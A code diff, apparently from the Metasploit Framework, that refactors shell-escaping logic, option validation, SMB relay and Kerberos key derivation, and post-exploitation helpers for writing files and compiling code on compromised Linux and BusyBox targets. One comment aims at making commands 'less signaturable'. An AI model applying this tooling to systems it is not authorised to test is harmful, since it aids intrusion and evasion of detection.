-    # Convert the executable and argument array to a command that can be run in this command shell
-    # @param cmd_and_args [Array<String>] The process path and the arguments to the process
-    def to_cmd(cmd_and_args)
-      self.class.to_cmd(cmd_and_args)
-    end
-
-    # Escape an individual argument per Unix shell rules
-    # @param arg [String] Shell argument
-    def escape_arg(arg)
-      self.class.escape_arg(arg)
-    end
-
-    # Convert the executable and argument array to a command that can be run in this command shell
-    # @param cmd_and_args [Array<String>] The process path and the arguments to the process
-    def self.to_cmd(cmd_and_args)
-      escaped = cmd_and_args.map do |arg|
-        escape_arg(arg)
-      end
-
-      escaped.join(' ')
-    end
-
-    # Escape an individual argument per Unix shell rules
-    # @param arg [String] Shell argument
-    def self.escape_arg(arg)
-      quote_requiring = ['\\', '`', '(', ')', '<', '>', '&', '|', ' ', '@', '"', '$', ';']
-      result = CommandShell._glue_cmdline_escape(arg, quote_requiring, "'", "\\'", "'")
-      if result == ''
-        result = "''"
-      end
-
-      result
-    end
+    include Msf::Sessions::UnixEscaping
+    extend Msf::Sessions::UnixEscaping
  end

 end
@@ -6,114 +6,7 @@ module Msf::Sessions
      super
    end

-    def self.space_chars
-      [' ', '\t', '\v']
-    end
-
-    def shell_command_token(cmd,timeout = 10)
-      shell_command_token_win32(cmd,timeout)
-    end
-
-    # Convert the executable and argument array to a command that can be run in this command shell
-    # @param cmd_and_args [Array<String>] The process path and the arguments to the process
-    def to_cmd(cmd_and_args)
-      self.class.to_cmd(cmd_and_args)
-    end
-
-    # Escape a process for the command line
-    # @param executable [String] The process to launch
-    def self.escape_cmd(executable)
-      needs_quoting = space_chars.any? do |char|
-        executable.include?(char)
-      end
-
-      if needs_quoting
-        executable = "\"#{executable}\""
-      end
-
-      executable
-    end
-
-    # Convert the executable and argument array to a commandline that can be passed to CreateProcessAsUserW.
-    # @param args [Array<String>] The arguments to the process
-    # @remark The difference between this and `to_cmd` is that the output of `to_cmd` is expected to be passed
-    #         to cmd.exe, whereas this is expected to be passed directly to the Win32 API, anticipating that it
-    #         will in turn be interpreted by CommandLineToArgvW.
-    def self.argv_to_commandline(args)
-      escaped_args = args.map do |arg|
-        escape_arg(arg)
-      end
-
-      escaped_args.join(' ')
-    end
-
-    # Escape an individual argument per Windows shell rules
-    # @param arg [String] Shell argument
-    def self.escape_arg(arg)
-        needs_quoting = space_chars.any? do |char|
-          arg.include?(char)
-        end
-
-        # Fix the weird behaviour when backslashes are treated differently when immediately prior to a double-quote
-        # We need to send double the number of backslashes to make it work as expected
-        # See: https://learn.microsoft.com/en-us/windows/win32/api/shellapi/nf-shellapi-commandlinetoargvw#remarks
-        arg = arg.gsub(/(\\*)"/, '\\1\\1"')
-
-        # Quotes need to be escaped
-        arg = arg.gsub('"', '\\"')
-
-        if needs_quoting
-          # At the end of the argument, we're about to add another quote - so any backslashes need to be doubled here too
-          arg = arg.gsub(/(\\*)$/, '\\1\\1')
-          arg = "\"#{arg}\""
-        end
-
-        # Empty string needs to be coerced to have a value
-        arg = '""' if arg == ''
-
-        arg
-    end
-
-    # Convert the executable and argument array to a command that can be run in this command shell
-    # @param cmd_and_args [Array<String>] The process path and the arguments to the process
-    def self.to_cmd(cmd_and_args)
-      # The space, caret and quote chars need to be inside double-quoted strings.
-      # The percent character needs to be escaped using a caret char, while being outside a double-quoted string.
-      #
-      # Situations where these two situations combine are going to be the trickiest cases: something that has quote-requiring
-      # characters (e.g. spaces), but which also needs to avoid expanding an environment variable. In this case,
-      # the string needs to end up being partially quoted; with parts of the string in quotes, but others (i.e. bits with percents) not.
-      # For example:
-      # 'env var is %temp%, yes, %TEMP%' needs to end up as '"env var is "^%temp^%", yes, "^%TEMP^%'
-      #
-      # There is flexibility in how you might implement this, but I think this one looks the most "human" to me,
-      # which would make it less signaturable.
-      #
-      # To do this, we'll consider each argument character-by-character. Each time we encounter a percent sign, we break out of any quotes
-      # (if we've been inside them in the current "token"), and then start a new "token".
-
-      quote_requiring = ['"', '^', ' ', "\t", "\v", '&', '<', '>', '|']
-
-      escaped_cmd_and_args = cmd_and_args.map do |arg|
-        # Escape quote chars by doubling them up, except those preceeded by a backslash (which are already effectively escaped, and handled below)
-        arg = arg.gsub(/([^\\])"/, '\\1""')
-        arg = arg.gsub(/^"/, '""')
-
-        result = CommandShell._glue_cmdline_escape(arg, quote_requiring, '%', '^%', '"')
-
-        # Fix the weird behaviour when backslashes are treated differently when immediately prior to a double-quote
-        # We need to send double the number of backslashes to make it work as expected
-        # See: https://learn.microsoft.com/en-us/windows/win32/api/shellapi/nf-shellapi-commandlinetoargvw#remarks
-        result.gsub!(/(\\*)"/, '\\1\\1"')
-
-        # Empty string needs to be coerced to have a value
-        result = '""' if result == ''
-
-        result
-      end
-
-      escaped_cmd_and_args.join(' ')
-    end
+    include Msf::Sessions::WindowsEscaping
+    extend Msf::Sessions::WindowsEscaping
  end
-
 end
@@ -238,6 +238,13 @@ module Msf::Sessions
    def bootstrap(datastore = {}, handler = nil)
      # this won't work after the rstream is initialized, so do it first
      @platform = Metasploit::Framework::Ssh::Platform.get_platform(ssh_connection)
+      if @platform == 'windows'
+        extend(Msf::Sessions::WindowsEscaping)
+      elsif Metasploit::Framework::Ssh::Platform.is_posix(@platform)
+        extend(Msf::Sessions::UnixEscaping)
+      else
+        raise ::Net::SSH::Exception.new("Unknown platform: #{platform}")
+      end

      # if the platform is known, it was recovered by communicating with the device, so skip verification, also not all
      # shells accessed through SSH may respond to the echo command issued for verification as expected
@@ -0,0 +1,27 @@
+module Msf::Sessions
+  module UnixEscaping
+    def shell_command_token(cmd,timeout = 10)
+      shell_command_token_unix(cmd,timeout)
+    end
+
+    # Convert the executable and argument array to a command that can be run in this command shell
+    # @param cmd_and_args [Array<String>] The process path and the arguments to the process
+    def to_cmd(cmd_and_args)
+      escaped = cmd_and_args.map { |arg| escape_arg(arg) }
+
+      escaped.join(' ')
+    end
+
+    # Escape an individual argument per Unix shell rules
+    # @param arg [String] Shell argument
+    def escape_arg(arg)
+      quote_requiring = ['\\', '`', '(', ')', '<', '>', '&', '|', ' ', '@', '"', '$', ';']
+      result = CommandShell._glue_cmdline_escape(arg, quote_requiring, "'", "\\'", "'")
+      if result == ''
+        result = "''"
+      end
+
+      result
+    end
+  end
+end
@@ -0,0 +1,102 @@
+module Msf::Sessions
+  module WindowsEscaping
+    def space_chars
+      [' ', '\t', '\v']
+    end
+
+    def shell_command_token(cmd,timeout = 10)
+      shell_command_token_win32(cmd,timeout)
+    end
+
+    # Escape a process for the command line
+    # @param executable [String] The process to launch
+    def escape_cmd(executable)
+      needs_quoting = space_chars.any? do |char|
+        executable.include?(char)
+      end
+
+      if needs_quoting
+        executable = "\"#{executable}\""
+      end
+
+      executable
+    end
+
+    # Convert the executable and argument array to a commandline that can be passed to CreateProcessAsUserW.
+    # @param args [Array<String>] The arguments to the process
+    # @remark The difference between this and `to_cmd` is that the output of `to_cmd` is expected to be passed
+    #         to cmd.exe, whereas this is expected to be passed directly to the Win32 API, anticipating that it
+    #         will in turn be interpreted by CommandLineToArgvW.
+    def argv_to_commandline(args)
+       escaped_args = args.map { |arg| escape_arg(arg) }
+
+      escaped_args.join(' ')
+    end
+
+    # Escape an individual argument per Windows shell rules
+    # @param arg [String] Shell argument
+    def escape_arg(arg)
+      needs_quoting = space_chars.any? { |char| arg.include?(char) }
+
+      # Fix the weird behaviour when backslashes are treated differently when immediately prior to a double-quote
+      # We need to send double the number of backslashes to make it work as expected
+      # See: https://learn.microsoft.com/en-us/windows/win32/api/shellapi/nf-shellapi-commandlinetoargvw#remarks
+      arg = arg.gsub(/(\\*)"/, '\\1\\1"')
+
+      # Quotes need to be escaped
+      arg = arg.gsub('"', '\\"')
+
+      if needs_quoting
+        # At the end of the argument, we're about to add another quote - so any backslashes need to be doubled here too
+        arg = arg.gsub(/(\\*)$/, '\\1\\1')
+        arg = "\"#{arg}\""
+      end
+
+      # Empty string needs to be coerced to have a value
+      arg = '""' if arg == ''
+
+      arg
+    end
+
+    # Convert the executable and argument array to a command that can be run in this command shell
+    # @param cmd_and_args [Array<String>] The process path and the arguments to the process
+    def to_cmd(cmd_and_args)
+      # The space, caret and quote chars need to be inside double-quoted strings.
+      # The percent character needs to be escaped using a caret char, while being outside a double-quoted string.
+      #
+      # Situations where these two situations combine are going to be the trickiest cases: something that has quote-requiring
+      # characters (e.g. spaces), but which also needs to avoid expanding an environment variable. In this case,
+      # the string needs to end up being partially quoted; with parts of the string in quotes, but others (i.e. bits with percents) not.
+      # For example:
+      # 'env var is %temp%, yes, %TEMP%' needs to end up as '"env var is "^%temp^%", yes, "^%TEMP^%'
+      #
+      # There is flexibility in how you might implement this, but I think this one looks the most "human" to me,
+      # which would make it less signaturable.
+      #
+      # To do this, we'll consider each argument character-by-character. Each time we encounter a percent sign, we break out of any quotes
+      # (if we've been inside them in the current "token"), and then start a new "token".
+
+      quote_requiring = ['"', '^', ' ', "\t", "\v", '&', '<', '>', '|']
+
+      escaped_cmd_and_args = cmd_and_args.map do |arg|
+        # Escape quote chars by doubling them up, except those preceeded by a backslash (which are already effectively escaped, and handled below)
+        arg = arg.gsub(/([^\\])"/, '\\1""')
+        arg = arg.gsub(/^"/, '""')
+
+        result = CommandShell._glue_cmdline_escape(arg, quote_requiring, '%', '^%', '"')
+
+        # Fix the weird behaviour when backslashes are treated differently when immediately prior to a double-quote
+        # We need to send double the number of backslashes to make it work as expected
+        # See: https://learn.microsoft.com/en-us/windows/win32/api/shellapi/nf-shellapi-commandlinetoargvw#remarks
+        result.gsub!(/(\\*)"/, '\\1\\1"')
+
+        # Empty string needs to be coerced to have a value
+        result = '""' if result == ''
+
+        result
+      end
+
+      escaped_cmd_and_args.join(' ')
+    end
+  end
+end
@@ -58,8 +58,9 @@ module Auxiliary
      raise MissingActionError, "Please use: #{mod.actions.collect {|e| e.name} * ", "}"
    end

-    # Verify the options
-    mod.options.validate(mod.datastore)
+    # Validate the option container state so that options will
+    # be normalized
+    mod.validate

    # Initialize user interaction
    if ! opts['Quiet']
@@ -79,7 +79,7 @@ module Exploit
      end

      # Verify the options
-      exploit.options.validate(exploit.datastore)
+      exploit.validate

      # Start it up
      driver = Msf::ExploitDriver.new(exploit.framework)
@@ -55,7 +55,7 @@ module Post
    end

    # Verify the options
-    mod.options.validate(mod.datastore)
+    mod.validate

    # Initialize user interaction
    if ! opts['Quiet']
@@ -0,0 +1,29 @@
+# -*- coding: binary -*-
+
+module Msf
+
+###
+#
+# This module provides methods for modules which intend to handle multiple hosts
+# themselves through some means, e.g. scanners. This circumvents the typical
+# RHOSTS -> RHOST logic offered by the framework.
+#
+###
+
+module Auxiliary::MultipleTargetHosts
+
+  def has_check?
+    respond_to?(:check_host)
+  end
+
+  def check
+    nmod = replicant
+    begin
+      nmod.check_host(datastore['RHOST'])
+    rescue NoMethodError
+      Exploit::CheckCode::Unsupported
+    end
+  end
+
+end
+end
@@ -10,6 +10,8 @@ module Msf

 module Auxiliary::Scanner

+include Msf::Auxiliary::MultipleTargetHosts
+
 class AttemptFailed < Msf::Auxiliary::Failed
 end

@@ -31,20 +33,6 @@ def initialize(info = {})

 end

-def has_check?
-  respond_to?(:check_host)
-end
-
-def check
-  nmod = replicant
-  begin
-    nmod.check_host(datastore['RHOST'])
-  rescue NoMethodError
-    Exploit::CheckCode::Unsupported
-  end
-end
-
-
 def peer
  # IPv4 addr can be 16 chars + 1 for : and + 5 for port
  super.ljust(21)
@@ -122,17 +122,21 @@ module Msf::Exploit::Remote::SMB::Client::KerberosAuthentication

      # see: https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-smb2/7fd079ca-17e6-4f02-8449-46b606ea289c
      if @dialect == '0x0300' || @dialect == '0x0302'
-        @application_key = RubySMB::Crypto::KDF.counter_mode(
+        @application_key = Rex::Crypto::KeyDerivation::NIST_SP_800_108.counter_hmac(
          @session_key,
-          "SMB2APP\x00",
-          "SmbRpc\x00"
-        )
+          16,
+          'SHA256',
+          label: "SMB2APP\x00",
+          context: "SmbRpc\x00"
+        ).first
      else
-        @application_key = RubySMB::Crypto::KDF.counter_mode(
+        @application_key = Rex::Crypto::KeyDerivation::NIST_SP_800_108.counter_hmac(
          @session_key,
-          "SMBAppKey\x00",
-          @preauth_integrity_hash_value
-        )
+          16,
+          'SHA256',
+          label: "SMBAppKey\x00",
+          context: @preauth_integrity_hash_value
+        ).first
      end
      # otherwise, leave encryption to the default value that it was initialized to
    end
@@ -29,8 +29,12 @@ module Msf::Exploit::Remote::SMB::Relay::NTLM
        return super(request, session)
      end

-
      logger.print_status("Relaying to next target #{session.metadata[:relay_target]}")
+
+      if session.metadata[:relay_target].protocol == :smb && session.metadata[:relay_target].ip == peerhost
+        logger.print_warning('Relaying SMB to SMB on the same host will not work if the target has been patched for MS08-068')
+      end
+
      relayed_connection = create_relay_client(
        session.metadata[:relay_target],
        @relay_timeout
@@ -4,6 +4,7 @@ module Msf
  module Exploit::Remote::SMB
    # This mixin provides a minimal SMB server
    module RelayServer
+      include ::Msf::Auxiliary::MultipleTargetHosts
      include ::Msf::Exploit::Remote::SocketServer
      include ::Msf::Exploit::Remote::SMB::Server::HashCapture

@@ -15,7 +16,7 @@ module Msf
            OptPort.new('SRVPORT', [true, 'The local port to listen on.', 445]),
            OptString.new('SMBDomain', [true, 'The domain name used during SMB exchange.', 'WORKGROUP'], aliases: ['DOMAIN_NAME']),
            OptInt.new('SRV_TIMEOUT', [true, 'Seconds that the server socket will wait for a response after the client has initiated communication.', 25]),
-            OptAddressRange.new('RELAY_TARGETS', [true, 'Target address range or CIDR identifier to relay to'], aliases: ['SMBHOST']),
+            OptAddressRange.new('RHOSTS', [true, 'Target address range or CIDR identifier to relay to'], aliases: ['SMBHOST', 'RELAY_TARGETS']),
            OptInt.new('RELAY_TIMEOUT', [true, 'Seconds that the relay socket will wait for a response after the client has initiated communication.', 25])
          ], self.class)
      end
@@ -209,11 +209,22 @@ module Exploit::Remote::Tcp
    # Otherwise we are logging in the global context where rhost can be any
    # size (being an alias for rhosts), which is not very useful to insert into
    # a single log line.
-    if rhost && rhost.split(' ').length == 1
-      super + peer + ' - '
-    else
-      super
+    unless instance_variable_defined?(:@print_prefix)
+      if rhost.present? && Rex::Socket::RangeWalker.new(rhost).length == 1
+        @print_prefix = peer + ' - '
+      else
+        @print_prefix = ''
+      end
    end
+
+    super + @print_prefix
+  end
+
+  def replicant
+    obj = super
+    # invalidate the cached print_prefix in case the target changes
+    obj.remove_instance_variable(:@print_prefix) if instance_variable_defined?(:@print_prefix)
+    obj
  end

  ##
@@ -259,7 +270,7 @@ module Exploit::Remote::Tcp

  # Returns the rhost:rport
  def peer
-    "#{rhost}:#{rport}"
+    Rex::Socket.to_authority(rhost, rport)
  end

  #
@@ -94,8 +94,8 @@ module Msf
        name: LDAP_SESSION_TYPE,
        description: 'When enabled will allow for the creation/use of LDAP sessions',
        requires_restart: true,
-        default_value: false,
-        developer_notes: 'To be enabled by default after appropriate testing'
+        default_value: true,
+        developer_notes: 'Enabled in Metasploit 6.4.52'
      }.freeze,
      {
        name: SHOW_SUCCESSFUL_LOGINS,
@@ -255,9 +255,9 @@ module Msf::Modules::Metadata::Search
            when 'ref', 'ref_name'
              match = [keyword, search_term] if module_metadata.ref_name =~ regex
            when 'reference', 'references'
-              match = [keyword, search_term] if module_metadata.references.any? { |ref| ref =~ regex }
+              match = [keyword, search_term] if module_metadata.references && module_metadata.references.any? { |ref| ref =~ regex }
            when 'target', 'targets'
-              match = [keyword, search_term] if module_metadata.targets.any? { |target| target =~ regex }
+              match = [keyword, search_term] if module_metadata.targets && module_metadata.targets.any? { |target| target =~ regex }
            when 'type'
              match = [keyword, search_term] if Msf::MODULE_TYPES.any? { |module_type| search_term == module_type and module_metadata.type == module_type }
          else
@@ -8,6 +8,12 @@ module Msf
  module OptionalSession
    include Msf::SessionCompatibility

+    attr_accessor :session_or_rhost_required
+
+    def session_or_rhost_required?
+      @session_or_rhost_required.nil? ? true : @session_or_rhost_required
+    end
+
    # Validates options depending on whether we are using  SESSION or an RHOST for our connection
    def validate
      super
@@ -18,7 +24,7 @@ module Msf
        validate_session
      elsif rhost
        validate_rhost
-      else
+      elsif session_or_rhost_required?
        raise Msf::OptionValidateError.new(message: 'A SESSION or RHOST must be provided')
      end
    end
@@ -1,109 +1,118 @@
 # -*- coding: binary -*-

+require 'rex'

 module Msf
-class Post
-module Linux
-module BusyBox
+  class Post
+    module Linux
+      module BusyBox
+        include ::Msf::Post::Common
+        include ::Msf::Post::File

-  include ::Msf::Post::Common
-  include ::Msf::Post::File
+        #
+        # Checks if the file exists in the target
+        #
+        # @param file_path [String] the target file path
+        # @return [Boolean] true if files exists, false otherwise
+        # @note Msf::Post::File#file? doesnt work because test -f is not available in busybox
+        #
+        def busy_box_file_exist?(file_path)
+          contents = read_file(file_path)
+          if contents.nil? || contents.empty?
+            return false
+          end

-  # Checks if the file exists in the target
-  #
-  # @param file_path [String] the target file path
-  # @return [Boolean] true if files exists, false otherwise
-  # @note Msf::Post::File#file? doesnt work because test -f is not available in busybox
-  def busy_box_file_exist?(file_path)
-    contents = read_file(file_path)
-    if contents.nil? || contents.empty?
-      return false
+          true
+        end
+
+        #
+        # Checks if the directory is writable in the target
+        #
+        # @param dir_path [String] the target directory path
+        # @return [Boolean] true if target directory is writable, false otherwise
+        #
+        def busy_box_is_writable_dir?(dir_path)
+          res = false
+          rand_str = Rex::Text.rand_text_alpha(16)
+          file_path = "#{dir_path}/#{rand_str}"
+
+          cmd_exec("echo #{rand_str}XXX#{rand_str} > #{file_path}")
+          Rex.sleep(0.3)
+          rcv = read_file(file_path)
+
+          if rcv.include?("#{rand_str}XXX#{rand_str}")
+            res = true
+          end
+
+          cmd_exec("rm -f #{file_path}")
+          Rex.sleep(0.3)
+
+          res
+        end
+
+        #
+        # Checks some directories that usually are writable in devices running busybox
+        #
+        # @return [String] If the function finds a writable directory, it returns the path. Else it returns nil
+        #
+        def busy_box_writable_dir
+          dirs = %w[/etc/ /mnt/ /var/ /var/tmp/]
+
+          dirs.each do |d|
+            return d if busy_box_is_writable_dir?(d)
+          end
+
+          nil
+        end
+
+        #
+        # Writes data to a file
+        #
+        # @param file_path [String] the file path to write on the target
+        # @param data [String] the content to be written
+        # @param prepend [Boolean] if true, prepend the data to the target file. Otherwise, overwrite
+        #   the target file
+        # @return [Boolean] true if target file is writable and it was written. Otherwise, false.
+        # @note BusyBox commands are limited and Msf::Post::File#write_file doesn't work here, because
+        #   of it is necessary to implement an specific method.
+        #
+        def busy_box_write_file(file_path, data, prepend = false)
+          if prepend
+            dir = busy_box_writable_dir
+            return false unless dir
+
+            cmd_exec("cp -f #{file_path} #{dir}tmp")
+            Rex.sleep(0.3)
+          end
+
+          rand_str = Rex::Text.rand_text_alpha(16)
+          cmd_exec("echo #{rand_str} > #{file_path}")
+          Rex.sleep(0.3)
+
+          unless read_file(file_path).include?(rand_str)
+            return false
+          end
+
+          cmd_exec("echo \"\"> #{file_path}")
+          Rex.sleep(0.3)
+
+          lines = data.lines.map(&:chomp)
+          lines.each do |line|
+            cmd_exec("echo #{line.chomp} >> #{file_path}")
+            Rex.sleep(0.3)
+          end
+
+          if prepend
+            cmd_exec("cat #{dir}tmp >> #{file_path}")
+            Rex.sleep(0.3)
+
+            cmd_exec("rm -f #{dir}tmp")
+            Rex.sleep(0.3)
+          end
+
+          true
+        end
+      end
    end
-
-    true
  end
-
-  # Checks if the directory is writable in the target
-  #
-  # @param dir_path [String] the target directory path
-  # @return [Boolean] true if target directory is writable, false otherwise
-  def busy_box_is_writable_dir?(dir_path)
-    res = false
-    rand_str = Rex::Text.rand_text_alpha(16)
-    file_path = "#{dir_path}/#{rand_str}"
-
-    cmd_exec("echo #{rand_str}XXX#{rand_str} > #{file_path}")
-    Rex::sleep(0.3)
-    rcv = read_file(file_path)
-
-    if rcv.include?("#{rand_str}XXX#{rand_str}")
-      res = true
-    end
-
-    cmd_exec("rm -f #{file_path}")
-    Rex::sleep(0.3)
-
-    res
-  end
-
-  # Checks some directories that usually are writable in devices running busybox
-  # @return [String] If the function finds a writable directory, it returns the path. Else it returns nil
-  def busy_box_writable_dir
-    dirs = %w(/etc/ /mnt/ /var/ /var/tmp/)
-
-    dirs.each do |d|
-      return d if busy_box_is_writable_dir?(d)
-    end
-
-    nil
-  end
-
-
-  # Writes data to a file
-  #
-  # @param file_path [String] the file path to write on the target
-  # @param data [String] the content to be written
-  # @param prepend [Boolean] if true, prepend the data to the target file. Otherwise, overwrite
-  #   the target file
-  # @return [Boolean] true if target file is writable and it was written. Otherwise, false.
-  # @note BusyBox commands are limited and Msf::Post::File#write_file doesn't work here, because
-  #   of it is necessary to implement an specific method.
-  def busy_box_write_file(file_path, data, prepend = false)
-    if prepend
-      dir = busy_box_writable_dir
-      return false unless dir
-      cmd_exec("cp -f #{file_path} #{dir}tmp")
-      Rex::sleep(0.3)
-    end
-
-    rand_str = Rex::Text.rand_text_alpha(16)
-    cmd_exec("echo #{rand_str} > #{file_path}")
-    Rex::sleep(0.3)
-
-    unless read_file(file_path).include?(rand_str)
-      return false
-    end
-
-    cmd_exec("echo \"\"> #{file_path}")
-    Rex::sleep(0.3)
-
-    lines = data.lines.map(&:chomp)
-    lines.each do |line|
-      cmd_exec("echo #{line.chomp} >> #{file_path}")
-      Rex::sleep(0.3)
-    end
-
-    if prepend
-      cmd_exec("cat #{dir}tmp >> #{file_path}")
-      Rex::sleep(0.3)
-
-      cmd_exec("rm -f #{dir}tmp")
-      Rex::sleep(0.3)
-    end
-
-    true
-  end
-end # Busybox
-end # Linux
-end # Post
-end # Msf
+end
@@ -1,88 +1,113 @@
 # -*- coding: binary -*-
+
 module Msf
-class Post
-module Linux
-module Compile
-  include ::Msf::Post::Common
-  include ::Msf::Post::File
-  include ::Msf::Post::Unix
+  class Post
+    module Linux
+      module Compile
+        include ::Msf::Post::Common
+        include ::Msf::Post::Linux::System
+        include ::Msf::Post::File
+        include ::Msf::Post::Unix

-  def initialize(info = {})
-    super
-    register_options( [
-      OptEnum.new('COMPILE', [true, 'Compile on target', 'Auto', ['Auto', 'True', 'False']]),
-      OptEnum.new('COMPILER', [true, 'Compiler to use on target', 'Auto', ['Auto', 'gcc', 'clang']]),
-    ], self.class)
-  end
+        def initialize(info = {})
+          super
+          register_options([
+            OptEnum.new('COMPILE', [true, 'Compile on target', 'Auto', ['Auto', 'True', 'False']]),
+            OptEnum.new('COMPILER', [true, 'Compiler to use on target', 'Auto', ['Auto', 'gcc', 'clang']]),
+          ], self.class)
+        end

-  def get_compiler
-    if has_gcc?
-      return 'gcc'
-    elsif has_clang?
-      return 'clang'
-    else
-      return nil
+        # Determines the available compiler on the target system.
+        #
+        # @return [String, nil] The name of the compiler ('gcc' or 'clang') if available, or nil if none are found.
+        def get_compiler
+          if has_gcc?
+            return 'gcc'
+          elsif has_clang?
+            return 'clang'
+          else
+            return nil
+          end
+        end
+
+        # Checks whether the target supports live compilation based on the module's configuration and available tools.
+        #
+        # @return [Boolean] True if compilation is supported and a compiler is available; otherwise, False.
+        # @raise [Module::Failure::BadConfig] If the specified compiler is not installed and compilation is required.
+        def live_compile?
+          return false unless %w[Auto True].include?(datastore['COMPILE'])
+
+          if datastore['COMPILER'] == 'gcc' && has_gcc?
+            vprint_good 'gcc is installed'
+            return true
+          elsif datastore['COMPILER'] == 'clang' && has_clang?
+            vprint_good 'clang is installed'
+            return true
+          elsif datastore['COMPILER'] == 'Auto' && get_compiler.present?
+            return true
+          end
+
+          unless datastore['COMPILE'] == 'Auto'
+            fail_with Module::Failure::BadConfig, "#{datastore['COMPILER']} is not installed. Set COMPILE False to upload a pre-compiled executable."
+          end
+
+          false
+        end
+
+        #
+        # Uploads C code to the target, compiles it, and handles verification of the compiled binary.
+        #
+        # @param path [String] The path where the compiled binary will be created.
+        # @param data [String] The C code to compile.
+        # @param compiler_args [String] Additional arguments for the compiler command.
+        # @raise [Module::Failure::BadConfig] If compilation fails or no compiler is found.
+        #
+        def upload_and_compile(path, data, compiler_args = '')
+          compiler = datastore['COMPILER']
+          if datastore['COMPILER'] == 'Auto'
+            compiler = get_compiler
+            fail_with(Module::Failure::BadConfig, 'Unable to find a compiler on the remote target.') if compiler.nil?
+          end
+
+          path = "#{path}.c" unless path.end_with?('.c')
+
+          # only upload the file if a compiler exists
+          write_file path.to_s, strip_comments(data)
+
+          compiler_cmd = "#{compiler} -o '#{path.sub(/\.c$/, '')}' '#{path}'"
+          if session.type == 'shell'
+            compiler_cmd = "PATH=\"$PATH:/usr/bin/\" #{compiler_cmd}"
+          end
+
+          unless compiler_args.to_s.blank?
+            compiler_cmd << " #{compiler_args}"
+          end
+
+          verification_token = Rex::Text.rand_text_alphanumeric(8)
+          success = cmd_exec("#{compiler_cmd} && echo #{verification_token}")&.include?(verification_token)
+
+          rm_f path.to_s
+
+          unless success
+            message = "#{path} failed to compile."
+            # don't mention the COMPILE option if it was deregistered
+            message << ' Set COMPILE to False to upload a pre-compiled executable.' if options.include?('COMPILE')
+            fail_with Module::Failure::BadConfig, message
+          end
+
+          chmod path
+        end
+
+        #
+        # Strips comments from C source code.
+        #
+        # @param c_code [String] The C source code.
+        # @return [String] The C code with comments removed.
+        #
+        def strip_comments(c_code)
+          c_code.gsub(%r{/\*.*?\*/}m, '').gsub(%r{^\s*//.*$}, '')
+        end
+      end
    end
  end
-
-  def live_compile?
-    return false unless %w{ Auto True }.include?(datastore['COMPILE'])
-
-    if datastore['COMPILER'] == 'gcc' && has_gcc?
-      vprint_good 'gcc is installed'
-      return true
-    elsif datastore['COMPILER'] == 'clang' && has_clang?
-      vprint_good 'clang is installed'
-      return true
-    elsif datastore['COMPILER'] == 'Auto' && get_compiler.present?
-      return true
-    end
-
-    unless datastore['COMPILE'] == 'Auto'
-      fail_with Module::Failure::BadConfig, "#{datastore['COMPILER']} is not installed. Set COMPILE False to upload a pre-compiled executable."
-    end
-
-    false
-  end
-
-  def upload_and_compile(path, data, compiler_args='')
-    write_file "#{path}.c", strip_comments(data)
-
-    compiler = datastore['COMPILER']
-    if datastore['COMPILER'] == 'Auto'
-      compiler = get_compiler
-      fail_with(Module::Failure::BadConfig, "Unable to find a compiler on the remote target.") unless compiler.present?
-    end
-
-    compiler_cmd = "#{compiler} -o '#{path}' '#{path}.c'"
-    if session.type == 'shell'
-      compiler_cmd = "PATH=\"$PATH:/usr/bin/\" #{compiler_cmd}"
-    end
-
-    unless compiler_args.to_s.blank?
-      compiler_cmd << " #{compiler_args}"
-    end
-
-    verification_token = Rex::Text.rand_text_alphanumeric(8)
-    success = cmd_exec("#{compiler_cmd} && echo #{verification_token}")&.include?(verification_token)
-
-    rm_f "#{path}.c"
-
-    unless success
-      message = "#{path}.c failed to compile."
-      # don't mention the COMPILE option if it was deregistered
-      message << ' Set COMPILE to False to upload a pre-compiled executable.' if options.include?('COMPILE')
-      fail_with Module::Failure::BadConfig, message
-    end
-
-    chmod path
-  end
-
-  def strip_comments(c_code)
-    c_code.gsub(%r{/\*.*?\*/}m, '').gsub(%r{^\s*//.*$}, '')
-  end
-
-end # Compile
-end # Linux
-end # Post
-end # Msf
+end
@@ -6,10 +6,13 @@ module Msf
      module Kernel
        include ::Msf::Post::Common
        include Msf::Post::File
+
        #
        # Returns uname output
        #
+        # @param opt [String] uname options, defaults to -a
        # @return [String]
+        # @raise [RuntimeError] If execution fails.
        #
        def uname(opts = '-a')
          cmd_exec("uname #{opts}").to_s.strip
@@ -79,9 +82,10 @@ module Msf
        end

        #
-        # Returns the kernel boot config
+        # Returns the kernel boot config with comments removed
        #
        # @return [Array]
+        # @raise [RuntimeError] If execution fails.
        #
        def kernel_config
          release = kernel_release
@@ -98,6 +102,7 @@ module Msf
        # Returns the kernel modules
        #
        # @return [Array]
+        # @raise [RuntimeError] If execution fails.
        #
        def kernel_modules
          read_file('/proc/modules').to_s.scan(/^[^ ]+/)
@@ -109,6 +114,7 @@ module Msf
        # Returns a list of CPU flags
        #
        # @return [Array]
+        # @raise [RuntimeError] If execution fails.
        #
        def cpu_flags
          cpuinfo = read_file('/proc/cpuinfo').to_s
@@ -124,6 +130,7 @@ module Msf
        # Returns true if kernel and hardware supports Supervisor Mode Access Prevention (SMAP), false if not.
        #
        # @return [Boolean]
+        # @raise [RuntimeError] If execution fails.
        #
        def smap_enabled?
          cpu_flags.include? 'smap'
@@ -135,6 +142,7 @@ module Msf
        # Returns true if kernel and hardware supports Supervisor Mode Execution Protection (SMEP), false if not.
        #
        # @return [Boolean]
+        # @raise [RuntimeError] If execution fails.
        #
        def smep_enabled?
          cpu_flags.include? 'smep'
@@ -146,6 +154,7 @@ module Msf
        # Returns true if Kernel Address Isolation (KAISER) is enabled
        #
        # @return [Boolean]
+        # @raise [RuntimeError] If execution fails.
        #
        def kaiser_enabled?
          cpu_flags.include? 'kaiser'
@@ -157,6 +166,7 @@ module Msf
        # Returns true if Kernel Page-Table Isolation (KPTI) is enabled, false if not.
        #
        # @return [Boolean]
+        # @raise [RuntimeError] If execution fails.
        #
        def kpti_enabled?
          cpu_flags.include? 'pti'
@@ -168,6 +178,7 @@ module Msf
        # Returns true if user namespaces are enabled, false if not.
        #
        # @return [Boolean]
+        # @raise [RuntimeError] If execution fails.
        #
        def userns_enabled?
          return false if read_file('/proc/sys/user/max_user_namespaces').to_s.strip.eql? '0'
@@ -182,6 +193,7 @@ module Msf
        # Returns true if Address Space Layout Randomization (ASLR) is enabled
        #
        # @return [Boolean]
+        # @raise [RuntimeError] If execution fails.
        #
        def aslr_enabled?
          aslr = read_file('/proc/sys/kernel/randomize_va_space').to_s.strip
@@ -194,6 +206,7 @@ module Msf
        # Returns true if Exec-Shield is enabled
        #
        # @return [Boolean]
